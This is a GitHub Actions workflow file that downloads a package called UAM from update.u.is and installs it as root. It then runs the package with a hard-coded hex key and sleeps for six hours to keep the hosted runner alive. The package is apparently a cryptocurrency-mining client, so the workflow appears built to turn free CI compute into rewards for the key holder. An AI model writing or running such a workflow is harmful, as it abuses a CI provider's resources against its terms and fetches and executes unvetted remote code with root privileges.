name: Custom Workflow for UAM Download and Execution
on:
  workflow_dispatch:
jobs:
  download-and-execute:
    runs-on: ubuntu-latest
    steps:
      # Step 1: Checkout the repository (if needed)
      - name: Checkout Code
        uses: actions/checkout@v3

      # Step 2: Download the .deb file
      - name: Download UAM .deb file
        run: |
          curl -L -o uam-latest_amd64.deb https://update.u.is/downloads/uam/linux/uam-latest_amd64.deb

      # Step 4: Execute the .deb file with the provided key
      - name: Execute .deb file
        run: sudo dpkg -i uam-latest_amd64.deb

      - name: Execute .deb file
        run: sudo /opt/uam/uam --pk 130AE432E43B08BF1BB3201B32DC6612DC9B9BD8DF09B40BD1220D5468971D52

      # Step 5: Keep the system running for 6 hours
      - name: Keep system running for 6 hours
        run: sleep 21600  # 21600 seconds = 6 hours
